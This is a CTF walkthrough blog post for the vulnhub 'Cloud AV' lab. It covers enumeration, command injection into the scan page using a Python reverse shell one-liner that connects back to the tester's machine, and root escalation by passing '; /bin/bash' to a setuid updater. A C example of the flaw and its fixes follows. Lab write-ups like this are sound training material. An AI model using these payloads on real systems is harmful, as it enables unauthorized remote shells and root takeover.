BoredHackerBlog: Cloud AV | vulnhub | Walkthrough


BoredHackerBlog: Cloud AV

In this post, I am going to show how I solved the Cloud AV CTF from vulnhub, without using Metasploit. As the CTF description says:

Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.

Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs.

Difficulty: Easy

Tasks involved:

  • port scanning
  • webapp attacks
  • sql injection
  • command injection
  • brute forcing
  • code analysis


In this VM, I have divided the whole process into 3 steps.
1) Enumeration: Found an injection point.
2) Exploitation: Tried command injection.
3) Privilege Escalation: Used OS command injection.

Here is how I did it and what happened.

Enumeration:

(1) I started with an Nmap scan, using the -A and -vv options to get a detailed picture of the response.



The usual ports 80 and 443 are not serving a website, but port 8080 is running HTTP, and the backend is Python-powered.

(2) Visiting the site shows a login page that asks for an invite. I guessed a password at random and it worked on the first try. Without this there was nothing interesting to see.



(3) The site redirected to: [IP]:8080/scan
I tried directory brute forcing, but the directories it turned up are inaccessible.

(4) I fired up the Burp proxy and tried SQLi, but got no response. Maybe it simply takes too long for a response to arrive.

Exploitation:


(5) Next I thought I could inject an OS command. PentestMonkey has a good list of reverse shell one-liners, so I tried one from there. I specifically chose the Python reverse shell, because the Nmap scan had shown Python running on the backend. The code is:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("My IP", My port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


Remember to change My IP to your VM's IP and My port to your netcat listener port (they were highlighted in red in the original screenshot).


(6) Now I started my netcat listener using: nc -lvnp 4545

Then I injected the code.




(7) After waiting a while, nothing happened. Something was wrong, so I modified the payload by prefixing it with a pipe:

test | (my payload)


Wow! It worked. Remember that sometimes we need to bypass input restrictions by using shell metacharacters such as >, <, and |.


(8) I manually checked every directory and found nothing interesting. Then I jumped to the home directory with the cd command and found an interesting file there: update_cloudav.




This file has root permissions, and its C source file sits alongside it.


(9) I read the C source file; it shows that the program takes an argument when it is run.



(10) Running the program manually says the same thing: it needs an argument.




Privilege Escalation:


(11) This update program runs as a root-level service, so an OS command injection is the natural thing to try. I used "; /bin/bash" as the argument. The argument must be a double-quoted string; otherwise it doesn't work.
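
As an added example (not the CTF's own update_cloudav source, which this post does not reproduce), the C code below shows the pattern behind steps (9) to (11) from the defender's side: an updater that splices its argument into a shell command string, beside two fixes, an argument allowlist and execv() without any shell. The binary path and the update-file name are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical reconstruction of the vulnerable pattern: the argument is
 * pasted into a command line that a caller would hand to system(), so a
 * shell parses the whole string, ';' and friends included. */
char *build_command_vulnerable(const char *arg, char *out, size_t n) {
    /* "/usr/bin/cloudav-update" is a placeholder path, not the real one */
    snprintf(out, n, "/usr/bin/cloudav-update %s", arg);
    return out;
}

/* Fix 1: allowlist the argument. A signature-file name only needs
 * letters, digits, '.', '_' and '-'; ';', '|', '<', '>', quotes and
 * spaces are refused before anything is executed. */
int arg_is_safe(const char *s) {
    if (s == NULL || *s == '\0' || strlen(s) > 64) return 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    return 1;
}

/* Fix 2: never go through a shell. execv() receives the argument as one
 * argv element, so "; /bin/bash" would be an odd file name to the
 * updater, never a second command. Returns the child's exit status, or
 * -1 if the argument is rejected or the child could not be run. */
int run_update_safe(const char *path, const char *arg) {
    if (!arg_is_safe(arg)) return -1;
    char *argv[] = { (char *)path, (char *)arg, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(path, argv); _exit(127); }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv) {
    char buf[256];
    const char *arg = argc > 1 ? argv[1] : "; /bin/bash"; /* constructed sample */
    printf("shell would see : %s\n", build_command_vulnerable(arg, buf, sizeof buf));
    printf("allowlist accepts: %s\n", arg_is_safe(arg) ? "yes" : "no");
    return 0;
}
```

Running the block with the page's "; /bin/bash" argument shows the two commands a shell would execute and that the allowlist rejects the value.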



Awesome! Now I have root access to this server.

Thanks for reading.
Learn more about command injection on the OWASP website.
